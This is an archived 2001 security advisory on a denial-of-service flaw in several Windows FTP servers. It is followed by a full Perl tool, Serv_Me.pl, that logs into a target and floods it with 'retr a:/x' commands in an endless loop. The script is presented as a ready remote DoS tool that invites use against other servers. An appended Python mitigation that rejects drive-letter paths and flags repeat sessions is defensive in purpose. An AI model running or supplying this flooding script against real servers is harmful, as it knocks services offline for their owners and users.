packetstorm / T-Omicron / PACKETSTORM:24734
History: Apr 25, 2001 - 12:00 a.m.

Hexyn-sa-19.txt

2001-04-25 00:00:00
T-Omicron
packetstormsecurity.com
`Hexyn / Securax Advisory #19 - Multiple FTP Server DoS  
  
Topic: Multiple FTP Server DoS  
Announced: 2001-02-17  
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...  
  
DISCLAIMER:  
***********  
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.  
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.  
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.  
  
THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL   
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS   
BE CORRECT.  
  
I. Problem Description  
**********************  
Most of the FTP servers available for Windows 9x/NT are vulnerable to  
a DoS attack. The bug is a consequence of the way Windows handles disk  
drives.  
  
II. Impact  
**************  
When sending the command "retr a:/blah" (or "get a:/blah" in the  
default UNIX FTP client), the server will freeze for about one second,  
and the CPU usage will go through the roof.  
  
Exploit:  
--------  
Available at: http://t-Omicr0n.hexyn.be/exploits.htm  
  
III. Solution  
*************  
At this time, no patch is available.  
  
IV. Credits  
***********  
Bug discovered by t-Omicr0n <[email protected]>  
  
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,   
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,   
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone   
at #[email protected]  
  
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be  
  
  
  
#!/usr/bin/perl  
  
#  
# Serv_Me.pl - Remote FTP DoS'er  
# ------------------------------  
# "And in the end I will be free, by kissing you, or killing me."  
# -- Mister Me.  
  
# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.  
# It DoSSeS by flooding the server with "retr a:/bla" commands.  
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...  
  
# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information  
# @ http://t-Omicr0n.hexyn.be/advisories.htm  
  
# I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell   
# out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,  
# that's considered a drop of bytes every second.  
# You can even DoS the server over a 1 KiloBit/s modem... :-)  
  
# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F,   
# Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips,   
# Lacrima, GigaByte and everyone at #[email protected]   
  
# WARNING: This *may* damage the server's floppy disk drive.  
  
use IO::Socket;   
  
sub initiate {  
if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}  
  
$host = $ARGV[0];  
$port = $ARGV[1];  
$user = $ARGV[2];  
$pass = $ARGV[3];  
};  
  
sub connecttoserver {  
print("Connecting to host: $host\n");  
$socket = IO::Socket::INET->new ( PeerAddr => $host,  
PeerPort => $port,  
Proto => "tcp",  
Type => SOCK_STREAM  
) || die "Can't connect to $host";   
  
print "Socket Connected. Logging in...\n";  
};  
  
sub login {  
print "user $user\n";  
print $socket "user $user\r\n";  
$response = <$socket>;  
print "$response\n";  
  
print "pass $pass\n";  
print $socket "pass $pass\r\n";  
$response = <$socket>;  
print "$response\n";  
  
print "Logged in. Dossing now. Press CTRL-C to stop.\n";  
};  
  
  
  
sub doit {  
for (;;){  
print "retr a:/x\n";  
print $socket "retr a:/x\r\n";  
$response = <$socket>;  
print "$response";  
}  
}  
  
initiate();  
connecttoserver();  
login();  
doit();  
  
# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be  
`
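
Added example, not part of the original advisory or its author's code: since section III lists no patch, a server-side mitigation is to refuse drive-qualified path arguments such as "a:/blah" before they reach the filesystem, and to flag sessions that keep sending them. It assumes the server exposes a virtual root, so legitimate clients never send drive letters; the function names, command set, threshold and sample log are constructed for illustration.

```python
import re
from collections import Counter

# Drive-qualified ("a:/x", "A:\\x", "a:x") or UNC ("//host/share") arguments.
DRIVE_PATH = re.compile(r"^\s*(?:[A-Za-z]:|[\\/]{2})")

# FTP verbs whose argument is a path (assumed set; extend for your server).
PATH_COMMANDS = {"RETR", "STOR", "APPE", "CWD", "LIST", "NLST", "SIZE",
                 "MDTM", "DELE", "RNFR", "RNTO", "MKD", "RMD", "STAT"}

REJECT_REPLY = "550 Requested action not taken."


def parse_command(line):
    """Split a raw FTP control-channel line into (VERB, argument)."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    return verb.upper(), arg.strip()


def check_command(line):
    """Return a reply to send instead of opening the path, or None to allow."""
    verb, arg = parse_command(line)
    if verb in PATH_COMMANDS and DRIVE_PATH.match(arg):
        return REJECT_REPLY
    return None


def flag_sessions(log, threshold=3):
    """log: iterable of (session_id, raw_line) pairs.

    Returns the sorted session ids that sent at least `threshold`
    rejected commands, i.e. the low-bandwidth repeat pattern the
    advisory describes.
    """
    hits = Counter(sid for sid, line in log if check_command(line))
    return sorted(sid for sid, count in hits.items() if count >= threshold)


# Constructed sample of control-channel commands (not captured traffic).
SAMPLE_LOG = [
    ("s1", "USER anonymous\r\n"),
    ("s1", "RETR readme.txt\r\n"),
    ("s2", "retr a:/x\r\n"),
    ("s2", "retr a:/x\r\n"),
    ("s2", "retr a:/x\r\n"),
    ("s3", "RETR A:\\blah\r\n"),
    ("s3", "CWD /pub\r\n"),
]

if __name__ == "__main__":
    print(flag_sessions(SAMPLE_LOG))
```

Rejecting before any file-open call is the point: the advisory attributes the stall to how Windows handles the drive, so the check has to run ahead of the filesystem access rather than after it fails.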